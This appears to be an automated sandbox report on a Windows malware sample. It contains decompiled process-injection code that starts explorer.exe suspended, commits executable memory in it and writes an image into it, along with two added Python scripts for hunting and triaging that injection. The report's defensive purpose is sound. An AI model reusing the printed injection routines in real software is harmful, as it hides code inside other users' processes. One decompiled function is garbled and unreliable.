                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v13;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				long _v28;
                                    				intOrPtr _v36;
                                    				long _v44;
                                    				void* _v48;
                                    				void* _t38;
                                    				void* _t42;
                                    				void* _t49;
                                    				void* _t55;
                                    				void* _t57;
                                    				intOrPtr _t64;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t74;
                                    				void* _t76;
                                    				void* _t79;
                                    				intOrPtr* _t80;
                                    
                                    				_t80 = _t79 + 0xffffffd4;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t64 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v48, _t64);
                                    				_push(_t79);
                                    				_push(0x404205);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t80;
                                    				_v13 = 0;
                                    				_push(0);
                                    				_push(_v12);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80; // e_lfanew (DOS header +0x3c): _t74 -> IMAGE_NT_HEADERS of the PE image at _v12
                                    				_t76 = 0x10000000;
                                    				do {
                                    					_t76 = _t76 + 0x10000; // next 64 KiB slot above the image's preferred base
                                    					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed; local probe: OptionalHeader.ImageBase + _t76, OptionalHeader.SizeOfImage bytes, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
                                    					_t57 = _t38;
                                    					if(_t57 != 0) {
                                    						VirtualFree(_t57, 0, 0x8000); // executed; MEM_RELEASE the local probe
                                    						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed; same address, size and RWX protection, now in the target process _v8
                                    						_t57 = _t55;
                                    					}
                                    				} while (_t57 == 0 && _t76 <= 0x30000000); // retried until the remote allocation succeeds or _t76 has passed 0x30000000 (last attempt at ImageBase + 0x30010000)
                                    				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
                                    				_t42 = _v48;
                                    				if(_t42 != 0) {
                                    					_v24 = _t42;
                                    					_v20 = _v36;
                                    					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
                                    					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
                                    					if(_t49 != 0) {
                                    						_v13 = 1;
                                    					}
                                    				}
                                    				_pop(_t67);
                                    				 *[fs:eax] = _t67;
                                    				_push(E0040420C);
                                    				_t68 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v48, _t68);
                                    			}

                                    Instruction addresses (one per decompiled line, in listing order): 0x004040f7, 0x004040fd, 0x00404100, 0x00404106, 0x0040410c, 0x00404113, 0x00404114, 0x00404119, 0x0040411c, 0x0040411f, 0x00404128, 0x00404129, 0x00404130, 0x00404134, 0x0040413b, 0x0040413d, 0x00404142, 0x00404142, 0x00404159, 0x0040415e, 0x00404162, 0x0040416c, 0x00404186, 0x0040418b, 0x0040418b, 0x0040418d, 0x004041a5, 0x004041aa, 0x004041af, 0x004041b1, 0x004041b7, 0x004041c8, 0x004041dc, 0x004041e3, 0x004041e5, 0x004041e5, 0x004041e3, 0x004041eb, 0x004041ee, 0x004041f1, 0x004041f9, 0x00404204

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%
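                                    Added example, not part of this report or of the sample: a Python reconstruction of the addressing logic in E004040F4 and a hunt over a target-process memory map built from it. E004040F4 reads e_lfanew (DOS header +0x3c), OptionalHeader.ImageBase (NT headers +0x34) and OptionalHeader.SizeOfImage (NT headers +0x50) from the PE it is about to inject, then commits SizeOfImage bytes of PAGE_EXECUTE_READWRITE memory in the target at ImageBase + 0x10010000, stepping up by 0x10000 per failed attempt until the offset has passed 0x30000000. Because that base is derived from the image's own header rather than chosen by the system, an analyst with the injector's ImageBase and SizeOfImage can predict where the injected image sits in explorer.exe. The PE header bytes and the memory map below are constructed for the example; the constants come from the decompiled loop.

```python
import struct

# Values taken from the decompiled loop in E004040F4
PROBE_START = 0x10000000        # initial _t76
PROBE_STEP = 0x00010000         # added to _t76 before every attempt
PROBE_LIMIT = 0x30000000        # loop repeats while _t76 <= PROBE_LIMIT
MEM_COMMIT_RESERVE = 0x3000     # flAllocationType passed to VirtualAlloc/VirtualAllocEx
PAGE_EXECUTE_READWRITE = 0x40   # flProtect passed to VirtualAlloc/VirtualAllocEx
PAGE = 0x1000


def pe32_fields(image: bytes):
    """Read the header fields E004040F4 dereferences: e_lfanew (DOS header +0x3c),
    OptionalHeader.ImageBase (NT headers +0x34) and OptionalHeader.SizeOfImage
    (NT headers +0x50). Those offsets are the PE32 layout, so PE32+ is rejected."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + 0x58 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad e_lfanew or PE signature")
    if struct.unpack_from("<H", image, e_lfanew + 0x18)[0] != 0x10B:
        raise ValueError("not PE32: ImageBase is not at NT+0x34")
    image_base = struct.unpack_from("<I", image, e_lfanew + 0x34)[0]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + 0x50)[0]
    return e_lfanew, image_base, size_of_image


def candidate_bases(image_base: int):
    """Remote base addresses in the order the sample's do/while loop tries them:
    ImageBase + 0x10010000 first, +0x10000 per retry, last attempt at +0x30010000."""
    offset = PROBE_START
    while True:
        offset += PROBE_STEP
        yield (image_base + offset) & 0xFFFFFFFF
        if offset > PROBE_LIMIT:
            return


def is_candidate_base(base: int, image_base: int) -> bool:
    """Same range test as candidate_bases without enumerating all 8193 addresses."""
    delta = (base - image_base) & 0xFFFFFFFF
    return (delta % PROBE_STEP == 0
            and PROBE_START + PROBE_STEP <= delta <= PROBE_LIMIT + PROBE_STEP)


def find_injected_regions(regions, image_base: int, size_of_image: int):
    """Hunt over a memory map of the target process.
    regions: iterable of (base, region_size, protect, is_private).
    Flags private RWX regions large enough to hold the image whose base is one the
    sample's loop could have produced."""
    need = (size_of_image + PAGE - 1) & ~(PAGE - 1)
    hits = []
    for base, size, protect, private in regions:
        if (private and protect == PAGE_EXECUTE_READWRITE and size >= need
                and is_candidate_base(base, image_base)):
            hits.append(base)
    return hits


# Constructed PE32 header (not the sample's): e_lfanew=0x80, ImageBase=0x00400000,
# SizeOfImage=0x5A000. Only the fields the function reads are populated.
SAMPLE_HEADER = bytearray(0x100)
SAMPLE_HEADER[0:2] = b"MZ"
struct.pack_into("<I", SAMPLE_HEADER, 0x3C, 0x80)
SAMPLE_HEADER[0x80:0x84] = b"PE\0\0"
struct.pack_into("<H", SAMPLE_HEADER, 0x80 + 0x18, 0x10B)
struct.pack_into("<I", SAMPLE_HEADER, 0x80 + 0x34, 0x00400000)
struct.pack_into("<I", SAMPLE_HEADER, 0x80 + 0x50, 0x0005A000)
SAMPLE_HEADER = bytes(SAMPLE_HEADER)

# Constructed memory map of a hypothetical explorer.exe: (base, size, protect, is_private)
SAMPLE_REGIONS = [
    (0x00400000, 0x00500000, 0x02, False),  # host image, PAGE_READONLY, mapped
    (0x02A00000, 0x00100000, 0x04, True),   # heap, PAGE_READWRITE
    (0x10410000, 0x0005A000, 0x40, True),   # RWX private block at ImageBase + 0x10010000
    (0x6F000000, 0x00001000, 0x40, False),  # RWX but image-mapped, not a VirtualAllocEx result
    (0x10450000, 0x00001000, 0x40, True),   # RWX private but too small to hold the image
]

if __name__ == "__main__":
    e_lfanew, base, size = pe32_fields(SAMPLE_HEADER)
    print(f"e_lfanew=0x{e_lfanew:x} ImageBase=0x{base:08x} SizeOfImage=0x{size:x}")
    print(f"first remote base tried: 0x{next(candidate_bases(base)):08x}")
    print("suspect regions:", [hex(b) for b in find_injected_regions(SAMPLE_REGIONS, base, size)])
```

                                    The allocation granularity on 32-bit Windows is 64 KiB and VirtualAllocEx rounds an explicit lpAddress down to it, so the 0x10000 step keeps every candidate aligned as long as ImageBase is; the hunt therefore only needs to test the base, the protection and the size. Because the image is never mapped at its preferred base, the loader stub that follows this allocation (E00403EC0 in the listing) has to fix up relocations before the remote thread runs.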

                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
                                    				signed char _t26;
                                    				void* _t32;
                                    				intOrPtr* _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t49;
                                    				signed char _t55;
                                    				intOrPtr _t58;
                                    				void* _t60;
                                    				signed char* _t61;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    
                                    				_t61 = __edi;
                                    				_t55 = __edx;
                                    				_t49 = __ecx;
                                    				_t48 = __ebx;
                                    				asm("aaa");
                                    				 *__ecx =  *__ecx + __edx;
                                    				_t26 = __eax + 0x00000001 | 0x00000054;
                                    				_push(__ebx);
                                    				if(_t26 == 0) {
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t67;
                                    					E00401CAC(_t65 - 8, __ebx);
                                    					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
                                    					E00401CAC(_t65 - 0xc, __ebx);
                                    					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
                                    					_pop(_t58);
                                    					 *[fs:eax] = _t58;
                                    					_push(E00403871);
                                    					return E00401AE4(_t65 - 0xc, 2);
                                    				} else {
                                    					_t66 =  *(__esi + 0x67) * 0x61727241;
                                    					if(_t66 < 0) {
                                    						 *_t26 =  *_t26 + _t26;
                                    						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
                                    					}
                                    					asm("adc [eax], al");
                                    					_t43 = _t26 - 1;
                                    					 *_t43 =  *_t43 + _t43;
                                    					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
                                    					 *_t49 =  *_t49 + _t55;
                                    					_push(_t66);
                                    					asm("outsb");
                                    					asm("aaa");
                                    					_t45 = _t43 + 2;
                                    					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
                                    					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
                                    					asm("bound ecx, [ecx+0x6e]");
                                    					asm("outsw");
                                    					asm("adc al, 0x0");
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t61 = _t55;
                                    					_t46 = _t45 + 1;
                                    					 *_t46 =  *_t46 + _t55;
                                    					 *_t46 =  *_t46 + _t46;
                                    					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
                                    					_t60 = 0;
                                    					do {
                                    						_t60 = _t60 + 1;
                                    					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
                                    					return _t60;
                                    				}
                                    			}

                                    Instruction addresses (one per decompiled line, in listing order): 0x00403789, 0x00403789, 0x00403789, 0x00403789, 0x00403789, 0x0040378b, 0x0040378d, 0x0040378f, 0x00403790, 0x00403804, 0x00403807, 0x00403816, 0x00403828, 0x00403838, 0x0040384a, 0x00403851, 0x00403854, 0x00403857, 0x00403869, 0x00403792, 0x00403792, 0x00403799, 0x0040379b, 0x0040379d, 0x0040379d, 0x0040379f, 0x004037a2, 0x004037a3, 0x004037a5, 0x004037a9, 0x004037ab, 0x004037ac, 0x004037bd, 0x004037be, 0x004037bf, 0x004037c1, 0x004037c5, 0x004037c8, 0x004037ca, 0x004037cc, 0x004037ce, 0x004037d0, 0x004037d2, 0x004037d4, 0x004037d5, 0x004037d7, 0x004037d9, 0x004037dc, 0x004037de, 0x004037de, 0x004037e4, 0x004037eb, 0x004037eb

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				void* _t14;
                                    				void* _t26;
                                    				intOrPtr _t33;
                                    				void* _t38;
                                    				intOrPtr _t41;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t26 = __edx;
                                    				_t38 = __eax;
                                    				_push(_t41);
                                    				_push(0x40386a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t41;
                                    				E00401CAC( &_v12, __edx);
                                    				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
                                    				E00401CAC( &_v16, _t26);
                                    				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00403871);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    Instruction addresses (one per decompiled line, in listing order): 0x004037ef, 0x004037f1, 0x004037f3, 0x004037f8, 0x004037fa, 0x004037fe, 0x004037ff, 0x00403804, 0x00403807, 0x00403816, 0x00403828, 0x00403838, 0x0040384a, 0x00403851, 0x00403854, 0x00403857, 0x00403869

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t13;
                                    				intOrPtr _t23;
                                    				void* _t26;
                                    
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t26);
                                    				_push(0x405d61);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t26 + 0xfffffebc;
                                    				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
                                    				if(_t13 != 0xffffffff) {
                                    					FindClose(_t13);
                                    				}
                                    				_pop(_t23);
                                    				 *[fs:eax] = _t23;
                                    				_push(E00405D68);
                                    				return E00401AC0( &_v8);
                                    			}

                                    Instruction addresses (one per decompiled line, in listing order): 0x00405d0e, 0x00405d14, 0x00405d1b, 0x00405d1c, 0x00405d21, 0x00405d24, 0x00405d39, 0x00405d41, 0x00405d44, 0x00405d49, 0x00405d4d, 0x00405d50, 0x00405d53, 0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
                                    				void* _t2;
                                    				void* _t5;
                                    				void* _t9;
                                    				long _t10;
                                    				void* _t11;
                                    				SIZE_T* _t12;
                                    
                                    				_push(__ecx);
                                    				_t10 = __ecx;
                                    				_t11 = __edx;
                                    				_t5 = __eax;
                                    				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
                                    				_t9 = _t2;
                                    				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
                                    				return _t9;
                                    			}

                                    Instruction addresses (one per decompiled line, in listing order): 0x00403880, 0x00403881, 0x00403883, 0x00403885, 0x00403892, 0x00403897, 0x0040389e, 0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%
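                                    Added example, not part of this report or of the sample: a small Python triage script for the "APIs" lines that the listings above print for E004040F4, E0040387C and the other alloc-and-write helpers. Every one of those helpers follows the same shape, VirtualAllocEx with flAllocationType 0x3000 (MEM_COMMIT|MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory into the same handle, and the CreateProcessA call at the top of this section passes dwCreationFlags 0x4 (CREATE_SUSPENDED). The script parses lines in the report's own format, resolves parameters by their position in the real prototype, and emits one finding per indicator. Note that the report prints more values than an API takes (VirtualFree has three parameters but is listed with seven); the trailing values are whatever else was on the stack, so only positions inside the prototype are decoded. The input lines are copied from this page; the rule thresholds and ARG_INDEX table are the example's own.

```python
import re

# One "APIs" line of the report: "• Name.MODULE(arg,arg,...), ref: ADDRESS"
API_LINE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
PAGE_EXECUTE_READWRITE = 0x40
CREATE_SUSPENDED = 0x4

# 0-based positions of the interesting parameters in each prototype (example's own table).
# Values past the prototype in a listing are leftover stack contents and are ignored.
ARG_INDEX = {
    "VirtualAlloc":   {"flAllocationType": 2, "flProtect": 3},
    "VirtualAllocEx": {"flAllocationType": 3, "flProtect": 4},
    "CreateProcessA": {"dwCreationFlags": 5},
}


def parse_call(line):
    """Return {'api', 'module', 'args', 'ref'} or None; an unresolved '?' becomes None."""
    m = API_LINE.match(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [None if a.strip() in ("?", "") else int(a.strip(), 16) for a in raw_args.split(",")]
    return {"api": api, "module": module, "args": args, "ref": int(ref, 16)}


def param(call, name):
    """Parameter value by prototype position, or None if unknown or unresolved."""
    idx = ARG_INDEX.get(call["api"], {}).get(name)
    if idx is None or idx >= len(call["args"]):
        return None
    return call["args"][idx]


def alloc_flags(value):
    names = [n for n, bit in (("MEM_COMMIT", MEM_COMMIT), ("MEM_RESERVE", MEM_RESERVE)) if value & bit]
    return "|".join(names) or hex(value)


def classify(lines):
    """Findings as (ref, api, description) in listing order."""
    findings = []
    remote_rwx = False
    for line in lines:
        c = parse_call(line)
        if c is None:
            continue
        api = c["api"]
        if api in ("VirtualAlloc", "VirtualAllocEx"):
            prot, atype = param(c, "flProtect"), param(c, "flAllocationType")
            if prot == PAGE_EXECUTE_READWRITE and atype is not None and atype & MEM_COMMIT:
                scope = "remote" if api == "VirtualAllocEx" else "local"
                findings.append((c["ref"], api,
                                 f"{scope} RWX commit ({alloc_flags(atype)}, PAGE_EXECUTE_READWRITE)"))
                remote_rwx = remote_rwx or api == "VirtualAllocEx"
        elif api == "WriteProcessMemory" and remote_rwx:
            findings.append((c["ref"], api, "write into the foreign process after the remote RWX commit"))
        elif api == "CreateProcessA":
            flags = param(c, "dwCreationFlags")
            if flags is not None and flags & CREATE_SUSPENDED:
                findings.append((c["ref"], api, "child process created CREATE_SUSPENDED"))
    return findings


# Lines copied from the "APIs" sections of this report
SAMPLE_LINES = [
    "• CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C",
    "• VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159",
    "• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C",
    "• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186",
    "• WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8",
    "• FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39",
]

if __name__ == "__main__":
    for ref, api, why in classify(SAMPLE_LINES):
        print(f"{ref:08x} {api:<20} {why}")
```

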